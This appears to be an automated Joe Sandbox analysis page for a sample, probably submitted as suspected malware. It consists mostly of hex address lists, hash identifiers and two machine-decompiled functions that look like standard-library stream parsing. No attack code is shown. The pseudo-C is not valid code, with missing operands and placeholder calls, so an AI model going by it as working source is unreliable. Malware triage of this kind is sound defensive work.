0x0140f485
0x0140f489
0x0140f48c
0x0140f48f
0x0140f494
0x0140f496
0x0140f498
0x00000000
0x0140f49e
0x0140f49e
0x0140f4a0
0x0140f4a3
0x0140f4a6
0x0140f4ac
0x0140f4af
0x0140f4b1
0x0140f55c
0x0140f55f
0x0140f562
0x0140f565
0x0140f568
0x0140f56a
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f4b7
0x0140f4c5
0x0140f4ca
0x0140f4ce
0x0140f4d3
0x0140f4d8
0x0140f4d9
0x0140f4db
0x0140f4dd
0x0140f4df
0x0140f4e4
0x0140f4e7
0x0140f4e9
0x0140f4eb
0x0140f4eb
0x0140f4eb
0x00000000
0x0140f4eb
0x00000000
0x0140f4b1
0x0140f498
0x00000000
0x0140f475
0x0140f45b
0x00000000
0x0140efed
0x0140eff1
0x0140eff5
0x0140f79c
0x0140f79e
0x0140f7a2
0x0140f7a4
0x00000000
0x0140effb
0x0140efff
0x0140f001
0x0140f006
0x0140f009
0x0140f00d
0x0140f010
0x00000000
0x00000000
0x0140f016
0x0140f019
0x0140f294
0x0140f294
0x0140f297
0x0140f29e
0x0140f2a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f028
0x0140f028
0x0140f028
0x0140f028
0x0140f02b
0x0140f031
0x0140f033
0x0140f240
0x0140f243
0x0140f247
0x0140f24a
0x0140f24d
0x0140f24f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f039
0x0140f047
0x0140f04e
0x0140f053
0x0140f05d
0x0140f061
0x0140f063
0x0140f069
0x0140f06c
0x0140f06e
0x0140f070
0x0140f073
0x0140f076
0x0140f07c
0x0140f255
0x0140f259
0x0140f25c
0x0140f25f
0x0140f262
0x0140f082
0x0140f082
0x0140f082
0x0140f085
0x0140f08c
0x0140f08c
0x0140f07c
0x0140f08f
0x0140f095
0x0140f723
0x0140f726
0x0140f729
0x0140f7d0
0x0140f7d0
0x0140f72f
0x0140f732
0x0140f732
0x0140f09b
0x0140f0a2
0x0140f0a7
0x0140f3b3
0x0140f3b5
0x0140f3b8
0x0140f3c0
0x0140f3c3
0x0140f3c6
0x0140f3c6
0x0140f3c6
0x0140f3c9
0x0140f3cf
0x0140f3cf
0x0140f3c9
0x0140f3b8
0x0140f0b4
0x0140f358
0x0140f35b
0x0140f35d
0x0140f410
0x0140f414
0x00000000
0x0140f41a
0x0140f41a
0x0140f41f
0x00000000
0x0140f41f
0x0140f363
0x0140f363
0x0140f366
0x0140f369
0x0140f73d
0x0140f740
0x0140f742
0x0140f745
0x00000000
0x0140f74b
0x0140f74b
0x0140f74f
0x0140f756
0x00000000
0x0140f75c
0x0140f75c
0x0140f27c
0x0140f27c
0x0140f27f
0x0140f282
0x0140f424
0x0140f427
0x0140f42a
0x00000000
0x0140f430
0x0140f430
0x0140f430
0x00000000
0x0140f430
0x0140f288
0x0140f288
0x0140f288
0x0140f28b
0x0140f28e
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f28e
0x0140f282
0x0140f756
0x0140f36f
0x0140f36f
0x0140f009
0x0140f00d
0x0140f010
0x00000000
0x00000000
0x00000000
0x0140f010
0x0140f009
0x0140f369
0x00000000
0x0140f0ba
0x0140f0ba
0x0140f0be
0x0140f0be
0x0140f0c6
0x0140f2a6
0x0140f2aa
0x0140f2af
0x0140f2b2
0x0140f2b7
0x0140f2ba
0x0140f2be
0x0140f2c4
0x0140f2cb
0x0140f2ce
0x0140f2d3
0x0140f2d5
0x0140f693
0x0140f693
0x0140f2de
0x0140f2e1
0x0140f2e3
0x00000000
0x0140f2e5
0x0140f2e5
0x0140f2e9
0x00000000
0x0140f2eb
0x0140f2ee
0x0140f2f0
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f2f0
0x0140f2e9
0x00000000
0x0140f0cc
0x0140f0cc
0x0140f0d0
0x0140f2f6
0x0140f2f6
0x0140f2fa
0x00000000
0x0140f300
0x0140f300
0x0140f304
0x0140f670
0x0140f674
0x0140f676
0x0140f678
0x0140f67b
0x0140f67b
0x0140f67d
0x0140f680
0x0140f682
0x0140f30a
0x0140f30a
0x0140f30e
0x0140f313
0x0140f318
0x0140f31a
0x0140f31a
0x0140f31c
0x0140f31c
0x0140f321
0x0140f324
0x0140f329
0x0140f32c
0x0140f32c
0x00000000
0x0140f304
0x00000000
0x0140f0e1
0x0140f0e1
0x0140f0e1
0x0140f0e4
0x0140f0ea
0x0140f0f4
0x0140f0f4
0x0140f0d0
0x0140f0c6
0x0140f0b4
0x00000000
0x0140f270
0x0140f270
0x0140f273
0x0140f276
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f276
0x0140f009
0x0140eff5
0x0140f0fa
0x0140f0fe
0x0140f103
0x0140f103
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c8aa1089e4c0f2768001ccf4f225597ac9961ac579bd07cd230ef4aa43b46ed
Instruction ID: 5cf29a488c27d19ed29202022ca63ea7b0f6bc86984df4a505a41d9c24b764ba
Opcode Fuzzy Hash: 5c8aa1089e4c0f2768001ccf4f225597ac9961ac579bd07cd230ef4aa43b46ed
Instruction Fuzzy Hash: C252D4709042489FDB22CF6DC48479EBFB1AF45324F18857AE865AB3E2D335D84ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 013F9710 Relevance: 1.6, APIs: 1, Instructions: 357
COMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E013F9710(void* __ecx, void* __eflags, signed int _a4, signed char _a8, intOrPtr* _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				void* _v16;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed char _v49;
				signed int _v50;
				signed int _v56;
				signed int _v60;
				void _v64;
				signed char _v68;
				void* _v73;
				void* _v77;
				signed char _t182;
				signed char _t192;
				intOrPtr* _t193;
				void* _t197;
				signed int _t200;
				signed char* _t201;
				void* _t203;
				signed char _t208;
				signed int _t209;
				intOrPtr* _t216;
				void* _t218;
				signed int* _t223;
				void* _t226;
				signed char _t229;
				signed int _t232;
				signed int _t233;
				signed int* _t235;
				signed char* _t240;
				void* _t242;
				void* _t248;
				signed int _t250;
				void* _t256;
				signed int _t258;
				signed int _t261;
				void* _t264;
				signed int _t266;
				signed char _t268;
				signed int _t269;
				signed int _t270;
				signed char _t272;
				signed int _t273;
				intOrPtr* _t281;
				signed int _t283;
				intOrPtr* _t294;
				signed int _t295;
				char _t298;
				signed int _t305;
				signed int _t307;
				signed int _t309;
				signed int _t318;
				signed int _t322;
				signed int _t323;
				intOrPtr _t324;
				signed int _t325;
				signed int _t326;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t332;
				intOrPtr _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr* _t336;

				_t182 = _a8;
				_t327 = _a12;
				_v32 = _t182;
				_t266 = _a16;
				_v60 = _t182;
				_v56 = _a4;
				_v64 = _t327;
				 *_t334 = _a32 + 0x6c;
				_t322 = E01474F00(__eflags);
				_t335 = _t334 - E013D6170(0x1b + _a28 * 8 >> 4 << 4);
				_t305 =  &_v73 & 0xfffffff0;
				_v44 = _t305;
				_t306 = _t305 & 0xffffff00 | _v32 == 0xffffffff;
				_t192 = (_v56 & 0xffffff00 | _v56 != 0x00000000) & _t306;
				_v36 = _t192;
				if(_t192 != 0) {
					_t193 = _v56;
					_t306 = 0;
					__eflags =  *((intOrPtr*)(_t193 + 8)) -  *((intOrPtr*)(_t193 + 0xc));
					if( *((intOrPtr*)(_t193 + 8)) >=  *((intOrPtr*)(_t193 + 0xc))) {
						_v40 = 0;
						_t264 =  *((intOrPtr*)( *_t193 + 0x24))();
						_t306 = _v40 & 0x000000ff;
						__eflags = _t264 - 0xffffffff;
						if(_t264 == 0xffffffff) {
							_t306 = _v36 & 0x000000ff;
							_v36 = 0;
							_v56 = 0;
						}
					}
				}
				_v50 = _t266 == 0xffffffff;
				_t268 = (_t266 & 0xffffff00 | _t327 != 0x00000000) & _v50 & 0x000000ff;
				if(_t268 != 0) {
					__eflags =  *((intOrPtr*)(_t327 + 8)) -  *((intOrPtr*)(_t327 + 0xc));
					if( *((intOrPtr*)(_t327 + 8)) >=  *((intOrPtr*)(_t327 + 0xc))) {
						_v40 = _t306;
						_t197 =  *((intOrPtr*)( *_t327 + 0x24))();
						_t306 = _v40 & 0x000000ff;
						__eflags = _t197 - 0xffffffff;
						_t199 =  !=  ? _t327 : 0;
						_v64 =  !=  ? _t327 : 0;
						_t200 = 0;
						_t269 =  !=  ? 0 : _t268;
					} else {
						_t269 = 0;
					}
				} else {
					_t269 = _v50 & 0x000000ff;
				}
				if(_t269 != _t306) {
					__eflags = _v36;
					if(_v36 != 0) {
						_t307 = _v56;
						_t201 =  *(_t307 + 8);
						__eflags = _t201 -  *((intOrPtr*)(_t307 + 0xc));
						if(_t201 >=  *((intOrPtr*)(_t307 + 0xc))) {
							_t270 = _v56;
							_t203 =  *((intOrPtr*)( *_t270 + 0x24))();
							__eflags = _t203 - 0xffffffff;
							_t307 =  !=  ? _t203 : 0xffffffff;
							_t205 =  !=  ? _t270 : 0;
							_v32 = _t307;
							_v56 =  !=  ? _t270 : 0;
						} else {
							_v32 =  *_t201 & 0x000000ff;
						}
					}
					_t200 = _a28 + _a28;
					__eflags = _t200;
					_v36 = _t200;
					if(_t200 == 0) {
						goto L4;
					} else {
						_v40 = _t322;
						_t283 = 0;
						_t324 = _a24;
						_t332 = 0;
						while(1) {
							L44:
							_t298 =  *((char*)( *((intOrPtr*)(_t324 + _t283 * 4))));
							__eflags = _t298 - _v32;
							if(_t298 == _v32) {
								break;
							}
							_t307 = _v40;
							 *_t335 = _t298;
							_t248 =  *((intOrPtr*)( *_t307 + 8))();
							_t335 = _t335 - 4;
							__eflags = _v32 - _t248;
							if(_v32 == _t248) {
								break;
							} else {
								_t200 = _v36;
								_t270 = _t283 + 1;
								__eflags = _t270 - _t200;
								if(_t270 != _t200) {
									continue;
								}
							}
							L46:
							__eflags = _t332;
							if(_t332 == 0) {
								goto L4;
							} else {
								_t325 = _v56;
								_t250 =  *(_t325 + 8);
								__eflags = _t250 -  *((intOrPtr*)(_t325 + 0xc));
								if(_t250 >=  *((intOrPtr*)(_t325 + 0xc))) {
									 *((intOrPtr*)( *_v56 + 0x28))();
								} else {
									_t261 = _t250 + 1;
									__eflags = _t261;
									 *(_t325 + 8) = _t261;
								}
								_t256 = E013D6170(0x1b + _t332 * 4 >> 4 << 4);
								_t326 = 0;
								_t270 = _v44;
								_t336 = _t335 - _t256;
								_v32 = _t332;
								_t333 = _a24;
								_t258 =  &_v77 & 0xfffffff0;
								__eflags = _t258;
								_v68 = _t258;
								_v36 = _t258;
								do {
									 *_t336 =  *((intOrPtr*)(_t333 +  *(_t270 + _t326 * 4) * 4));
									_t200 = strlen(??);
									_t307 = _v36;
									 *(_t307 + _t326 * 4) = _t200;
									_t326 = _t326 + 1;
									__eflags = _v32 - _t326;
								} while (_v32 != _t326);
								_v60 = 0xffffffff;
								_t328 = 1;
							}
							goto L5;
						}
						 *(_v44 + _t332 * 4) = _t283;
						_t200 = _v36;
						_t283 = _t283 + 1;
						_t332 = _t332 + 1;
						__eflags = _t283 - _t200;
						if(_t283 != _t200) {
							goto L44;
						}
						goto L46;
					}
				} else {
					L4:
					_v68 = 0;
					_t323 = 0;
					_t328 = 0;
					while(1) {
						L5:
						_t309 = _t307 & 0xffffff00 | _v60 == 0xffffffff;
						_t208 = (_t200 & 0xffffff00 | _v56 != 0x00000000) & _t309;
						_v32 = _t208;
						if(_t208 != 0) {
							_t209 = _v56;
							__eflags =  *((intOrPtr*)(_t209 + 8)) -  *((intOrPtr*)(_t209 + 0xc));
							if( *((intOrPtr*)(_t209 + 8)) >=  *((intOrPtr*)(_t209 + 0xc))) {
								_t270 = _t209;
								_v36 = _t309;
								__eflags =  *((intOrPtr*)( *_t209 + 0x24))() - 0xffffffff;
								_t213 =  !=  ? _t270 : 0;
								_v56 =  !=  ? _t270 : 0;
								_t311 =  !=  ? 0 : _v32 & 0x000000ff;
								_v32 =  !=  ? 0 : _v32 & 0x000000ff;
								_t309 = _v36 & 0x000000ff;
							} else {
								_v32 = 0;
							}
						} else {
							_v32 = _t309;
						}
						_t272 = (_t270 & 0xffffff00 | _v64 != 0x00000000) & _v50;
						if(_t272 != 0) {
							goto L25;
						} else {
							_t273 = _v50 & 0x000000ff;
						}
						L9:
						if(_v32 == _t273) {
							L27:
							__eflags = _t323 - 1;
							if(_t323 == 1) {
								__eflags =  *_v68 - _t328;
								if( *_v68 != _t328) {
									goto L31;
								} else {
									goto L38;
								}
							} else {
								__eflags = _t323 - 2;
								if(_t323 != 2) {
									goto L31;
								} else {
									_t229 = _v68;
									__eflags =  *_t229 - _t328;
									if( *_t229 == _t328) {
										L38:
										_t226 =  *_v44;
										__eflags = _t226 - _a28;
										_t227 =  >=  ? _t226 - _a28 : _t226;
										 *_a20 =  >=  ? _t226 - _a28 : _t226;
										return _v56;
									} else {
										__eflags =  *((intOrPtr*)(_t229 + 4)) - _t328;
										if( *((intOrPtr*)(_t229 + 4)) == _t328) {
											goto L38;
										} else {
											goto L31;
										}
									}
								}
							}
						} else {
							L10:
							if(_v56 != 0 && _t309 != 0) {
								_t318 = _v56;
								_t240 =  *(_t318 + 8);
								__eflags = _t240 -  *((intOrPtr*)(_t318 + 0xc));
								if(_t240 >=  *((intOrPtr*)(_t318 + 0xc))) {
									_t281 = _v56;
									_t242 =  *((intOrPtr*)( *_t281 + 0x24))();
									__eflags = _t242 - 0xffffffff;
									_t320 =  !=  ? _t242 : 0xffffffff;
									_t244 =  !=  ? _t281 : 0;
									_v49 =  !=  ? _t242 : 0xffffffff;
									_v56 =  !=  ? _t281 : 0;
								} else {
									_v49 =  *_t240 & 0x000000ff;
								}
							} else {
								_v49 = _v60 & 0x000000ff;
							}
							if(_t323 == 0) {
								L31:
								_t223 = _a36;
								 *_t223 =  *_t223 | 0x00000004;
								__eflags =  *_t223;
								return _v56;
							} else {
								_v32 = _t328;
								_t307 = 0;
								_v48 = 0;
								_v36 = _v68;
								goto L17;
								do {
									while(1) {
										L17:
										_t232 = _t307 * 4;
										_t294 = _v36 + _t232;
										if(_v32 >=  *_t294) {
											_v48 = _v48 + 1;
											_t307 = _t307 + 1;
											__eflags = _t307;
											goto L16;
										}
										_t235 = _t232 + _v44;
										_v40 = _t235;
										if( *((intOrPtr*)( *((intOrPtr*)(_a24 +  *_t235 * 4)) + _v32)) == (_v49 & 0x000000ff)) {
											_t307 = _t307 + 1;
											goto L16;
										} else {
											_t323 = _t323 - 1;
											 *_v40 =  *((intOrPtr*)(_v44 + _t323 * 4));
											 *_t294 =  *((intOrPtr*)(_v36 + _t323 * 4));
											if(_t307 < _t323) {
												continue;
											}
										}
										goto L20;
									}
									L16:
									__eflags = _t307 - _t323;
								} while (_t307 < _t323);
								L20:
								_t270 = _v48;
								_t328 = _v32;
								if(_t323 == _t270) {
									goto L27;
								} else {
									_t295 = _v56;
									_t233 =  *(_t295 + 8);
									if(_t233 >=  *((intOrPtr*)(_t295 + 0xc))) {
										_t200 =  *((intOrPtr*)( *_v56 + 0x28))();
									} else {
										_t200 = _t233 + 1;
										 *(_t295 + 8) = _t200;
									}
									_v60 = 0xffffffff;
									_t328 = _t328 + 1;
									continue;
								}
							}
						}
						L65:
						L25:
						_t216 = _v64;
						__eflags =  *((intOrPtr*)(_t216 + 8)) -  *((intOrPtr*)(_t216 + 0xc));
						if( *((intOrPtr*)(_t216 + 8)) >=  *((intOrPtr*)(_t216 + 0xc))) {
							_v36 = _t309;
							_t218 =  *((intOrPtr*)( *_t216 + 0x24))();
							_t309 = _v36 & 0x000000ff;
							__eflags = _t218 - 0xffffffff;
							_t220 =  !=  ? _v64 : 0;
							_v64 =  !=  ? _v64 : 0;
							_t273 =  !=  ? 0 : _t272;
							goto L9;
						} else {
							__eflags = _v32;
							if(_v32 != 0) {
								goto L10;
							} else {
								goto L27;
							}
						}
						goto L65;
					}
				}
				goto L5;
			}

0x013f9719
0x013f9722
0x013f9725
0x013f9728
0x013f972b
0x013f9731
0x013f9734
0x013f9737
0x013f9742
0x013f9756
0x013f9761
0x013f9768
0x013f976b
0x013f9773
0x013f9775
0x013f9778
0x013f9a5d
0x013f9a60
0x013f9a65
0x013f9a68
0x013f9a72
0x013f9a75
0x013f9a78
0x013f9a7c
0x013f9a7f
0x013f9a87
0x013f9a8b
0x013f9a8f
0x013f9a8f
0x013f9a7f
0x013f9a68
0x013f9781
0x013f978e
0x013f9790
0x013f9aa3
0x013f9aa6
0x013f9b51
0x013f9b56
0x013f9b59
0x013f9b5d
0x013f9b65
0x013f9b68
0x013f9b6b
0x013f9b70
0x013f9aac
0x013f9aac
0x013f9aac
0x013f9796
0x013f9796
0x013f9796
0x013f979c
0x013f9979
0x013f997d
0x013f9b39
0x013f9b3c
0x013f9b3f
0x013f9b42
0x013f9b85
0x013f9b8c
0x013f9b94
0x013f9b97
0x013f9b9f
0x013f9ba2
0x013f9ba5
0x013f9b44
0x013f9b47
0x013f9b47
0x013f9b42
0x013f9986
0x013f9986
0x013f9988
0x013f998b
0x00000000
0x013f9991
0x013f9991
0x013f9994
0x013f9996
0x013f9999
0x013f99bf
0x013f99bf
0x013f99c2
0x013f99c5
0x013f99c8
0x00000000
0x00000000
0x013f99a0
0x013f99a5
0x013f99aa
0x013f99ad
0x013f99b0
0x013f99b3
0x00000000
0x013f99b5
0x013f99b5
0x013f99b8
0x013f99bb
0x013f99bd
0x00000000
0x00000000
0x013f99bd
0x013f99dd
0x013f99dd
0x013f99df
0x00000000
0x013f99e5
0x013f99e5
0x013f99e8
0x013f99eb
0x013f99ee
0x013f9b7d
0x013f99f4
0x013f99f4
0x013f99f4
0x013f99f7
0x013f99f7
0x013f9a07
0x013f9a0c
0x013f9a0e
0x013f9a11
0x013f9a13
0x013f9a16
0x013f9a1d
0x013f9a1d
0x013f9a20
0x013f9a23
0x013f9a30
0x013f9a36
0x013f9a39
0x013f9a3e
0x013f9a41
0x013f9a44
0x013f9a47
0x013f9a47
0x013f9a4c
0x013f9a53
0x013f9a53
0x00000000
0x013f99df
0x013f99cd
0x013f99d0
0x013f99d3
0x013f99d6
0x013f99d9
0x013f99db
0x00000000
0x00000000
0x00000000
0x013f99db
0x013f97a2
0x013f97a2
0x013f97a2
0x013f97a9
0x013f97ab
0x013f97b0
0x013f97b0
0x013f97b7
0x013f97bf
0x013f97c1
0x013f97c4
0x013f9900
0x013f9906
0x013f9909
0x013f9b07
0x013f9b0b
0x013f9b17
0x013f9b1f
0x013f9b22
0x013f9b2a
0x013f9b2d
0x013f9b30
0x013f990f
0x013f990f
0x013f990f
0x013f97ca
0x013f97ca
0x013f97ca
0x013f97d5
0x013f97d8
0x00000000
0x013f97de
0x013f97de
0x013f97de
0x013f97e2
0x013f97e5
0x013f98ca
0x013f98ca
0x013f98cd
0x013f9950
0x013f9952
0x00000000
0x00000000
0x00000000
0x00000000
0x013f98cf
0x013f98cf
0x013f98d2
0x00000000
0x013f98d4
0x013f98d4
0x013f98d7
0x013f98d9
0x013f9954
0x013f9957
0x013f995e
0x013f9961
0x013f9967
0x013f9976
0x013f98db
0x013f98db
0x013f98de
0x00000000
0x00000000
0x00000000
0x00000000
0x013f98de
0x013f98d9
0x013f98d2
0x013f97eb
0x013f97eb
0x013f97f0
0x013f9920
0x013f9923
0x013f9926
0x013f9929
0x013f9ab3
0x013f9aba
0x013f9ac2
0x013f9ac5
0x013f9acd
0x013f9ad0
0x013f9ad3
0x013f992f
0x013f9932
0x013f9932
0x013f97fa
0x013f97fe
0x013f97fe
0x013f9803
0x013f98e0
0x013f98e0
0x013f98e6
0x013f98e6
0x013f98f3
0x013f9809
0x013f980e
0x013f9811
0x013f9813
0x013f9816
0x013f9819
0x013f982b
0x013f982b
0x013f982b
0x013f982e
0x013f9838
0x013f983c
0x013f9820
0x013f9824
0x013f9824
0x013f9824
0x013f9824
0x013f9841
0x013f9848
0x013f9858
0x013f98a8
0x00000000
0x013f985a
0x013f985d
0x013f9866
0x013f986e
0x013f9872
0x00000000
0x00000000
0x013f9872
0x00000000
0x013f9858
0x013f9827
0x013f9827
0x013f9827
0x013f9874
0x013f9874
0x013f9877
0x013f987c
0x00000000
0x013f987e
0x013f987e
0x013f9881
0x013f9887
0x013f9945
0x013f988d
0x013f988d
0x013f9890
0x013f9890
0x013f9893
0x013f989a
0x00000000
0x013f989a
0x013f987c
0x013f9803
0x00000000
0x013f98b0
0x013f98b0
0x013f98b6
0x013f98b9
0x013f9adb
0x013f9ae4
0x013f9ae7
0x013f9aeb
0x013f9af3
0x013f9af7
0x013f9aff
0x00000000
0x013f98bf
0x013f98c1
0x013f98c4
0x00000000
0x00000000
0x00000000
0x00000000
0x013f98c4
0x00000000
0x013f98b9
0x013f97b0
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cce6b4587f30dbfce8047d47914a427e6d9c4dfa9c95e8b5e781425cad3ee32
Instruction ID: 848442833973d40a73a299bd8b748da63e5a90be82148b90271046b2ea319c30
Opcode Fuzzy Hash: 3cce6b4587f30dbfce8047d47914a427e6d9c4dfa9c95e8b5e781425cad3ee32
Instruction Fuzzy Hash: 76E16835E05259CFCF11CFA8C4807ADBBF2AF49228F198269E565AB391C334AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01423440 Relevance: 1.6, APIs: 1, Instructions: 328
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E01423440(void* __ecx, signed int __edx, void* __eflags, int _a4, int _a8, intOrPtr* _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				void* _v16;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed char _v49;
				signed int _v50;
				intOrPtr* _v56;
				void* _v57;
				signed int _v60;
				void* _v61;
				void* _t168;
				signed int _t171;
				signed int _t173;
				void* _t176;
				void* _t180;
				int _t183;
				signed char _t186;
				void* _t189;
				intOrPtr* _t191;
				void* _t193;
				signed int* _t197;
				intOrPtr* _t199;
				void* _t201;
				signed int _t207;
				int _t208;
				signed int* _t210;
				signed char* _t215;
				signed char _t217;
				void* _t221;
				void* _t228;
				signed int _t230;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				signed char _t238;
				signed int _t239;
				signed int _t240;
				signed char _t242;
				signed int _t243;
				signed int _t251;
				intOrPtr _t252;
				intOrPtr* _t254;
				intOrPtr* _t260;
				intOrPtr* _t262;
				char _t264;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				intOrPtr _t282;
				signed int* _t284;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				intOrPtr* _t289;
				intOrPtr* _t290;
				intOrPtr* _t291;

				_t268 = __edx;
				_t285 = _a12;
				_t236 = _a16;
				_v56 = _t285;
				 *_t289 = _a32 + 0x6c;
				_v40 = E01474F00(__eflags);
				_t168 = E013D6170(0x1b + _a28 * 8 >> 4 << 4);
				_t254 = _a4;
				_t290 = _t289 - _t168;
				_v44 =  &_v57 & 0xfffffff0;
				_t171 = _a8;
				_v36 = _t171;
				_t269 = _t268 & 0xffffff00 | _t171 == 0xffffffff;
				_t173 = (_t171 & 0xffffff00 | _t254 != 0x00000000) & _t269;
				if(_t173 != 0) {
					_t276 = _t173;
					__eflags =  *((intOrPtr*)(_t254 + 8)) -  *((intOrPtr*)(_t254 + 0xc));
					if( *((intOrPtr*)(_t254 + 8)) >=  *((intOrPtr*)(_t254 + 0xc))) {
						_t176 =  *((intOrPtr*)( *_t254 + 0x24))();
						__eflags = _t176 - 0xffffffff;
						if(_t176 != 0xffffffff) {
							goto L53;
						} else {
							_a4 = 0;
							_t269 = _t276;
							goto L1;
						}
					} else {
						L53:
						_t269 = 0;
						goto L1;
					}
					L7:
					_t242 = (_t240 & 0xffffff00 | _v56 != 0x00000000) & _v50;
					if(_t242 != 0) {
						_t191 = _v56;
						__eflags =  *((intOrPtr*)(_t191 + 8)) -  *((intOrPtr*)(_t191 + 0xc));
						if( *((intOrPtr*)(_t191 + 8)) >=  *((intOrPtr*)(_t191 + 0xc))) {
							_v40 = _t270;
							_t193 =  *((intOrPtr*)( *_t191 + 0x24))();
							_t270 = _v40 & 0x000000ff;
							__eflags = _t193 - 0xffffffff;
							_t195 =  !=  ? _v56 : 0;
							_v56 =  !=  ? _v56 : 0;
							_t243 =  !=  ? 0 : _t242;
						} else {
							_t243 = 0;
						}
					} else {
						_t243 = _v50 & 0x000000ff;
					}
					if(_t243 == _v32) {
						L25:
						__eflags = _t286 - 1;
						if(_t286 != 1) {
							__eflags = _t286 - 2;
							if(_t286 != 2) {
								goto L27;
							} else {
								_t199 = _v60;
								__eflags =  *_t199 - _t278;
								if( *_t199 == _t278) {
									goto L38;
								} else {
									__eflags =  *((intOrPtr*)(_t199 + 4)) - _t278;
									if( *((intOrPtr*)(_t199 + 4)) != _t278) {
										goto L27;
									} else {
										goto L38;
									}
								}
							}
						} else {
							__eflags =  *_v60 - _t278;
							if( *_v60 == _t278) {
								L38:
								_t201 =  *_v44;
								__eflags = _t201 - _a28;
								_t202 =  >=  ? _t201 - _a28 : _t201;
								 *_a20 =  >=  ? _t201 - _a28 : _t201;
								return _a4;
							} else {
								goto L27;
							}
						}
					} else {
						_t260 = _a4;
						if(_t260 == 0 || _t270 == 0) {
							_v49 = _v36 & 0x000000ff;
						} else {
							_t215 =  *(_t260 + 8);
							__eflags = _t215 -  *((intOrPtr*)(_t260 + 0xc));
							if(_t215 >=  *((intOrPtr*)(_t260 + 0xc))) {
								_t217 =  *((intOrPtr*)( *_t260 + 0x24))();
								__eflags = _t217 - 0xffffffff;
								if(_t217 == 0xffffffff) {
									_a4 = 0;
									_v49 = 0xff;
								} else {
									_v49 = _t217;
								}
							} else {
								_v49 =  *_t215 & 0x000000ff;
							}
						}
						if(_t286 == 0) {
							L27:
							_t197 = _a36;
							 *_t197 =  *_t197 | 0x00000004;
							__eflags =  *_t197;
							return _a4;
						} else {
							_v32 = _t278;
							_t269 = 0;
							_v48 = 0;
							_v36 = _v60;
							goto L17;
							do {
								while(1) {
									L17:
									_t207 = _t269 * 4;
									_t262 = _v36 + _t207;
									if(_v32 >=  *_t262) {
										break;
									}
									_t210 = _t207 + _v44;
									_v40 = _t210;
									if( *((intOrPtr*)( *((intOrPtr*)(_a24 +  *_t210 * 4)) + _v32)) == (_v49 & 0x000000ff)) {
										_t269 = _t269 + 1;
										goto L16;
									} else {
										_t286 = _t286 - 1;
										 *_v40 =  *((intOrPtr*)(_v44 + _t286 * 4));
										 *_t262 =  *((intOrPtr*)(_v36 + _t286 * 4));
										if(_t269 < _t286) {
											continue;
										}
									}
									goto L20;
								}
								_v48 = _v48 + 1;
								_t269 = _t269 + 1;
								__eflags = _t269;
								L16:
								__eflags = _t269 - _t286;
							} while (_t269 < _t286);
							L20:
							_t278 = _v32;
							if(_t286 == _v48) {
								goto L25;
							} else {
								_t240 = _a4;
								_t208 =  *(_t240 + 8);
								if(_t208 >=  *((intOrPtr*)(_t240 + 0xc))) {
									_t183 =  *((intOrPtr*)( *_t240 + 0x28))();
								} else {
									_t183 = _t208 + 1;
									 *(_t240 + 8) = _t183;
								}
								_a8 = 0xffffffff;
								_t278 = _t278 + 1;
								_v36 = 0xffffffff;
								while(1) {
									L5:
									_t270 = _t269 & 0xffffff00 | _v36 == 0xffffffff;
									_t186 = (_t183 & 0xffffff00 | _t240 != 0x00000000) & _t270;
									_v32 = _t186;
									if(_t186 != 0) {
										goto L30;
									} else {
										_v32 = _t270;
									}
									goto L7;
									L30:
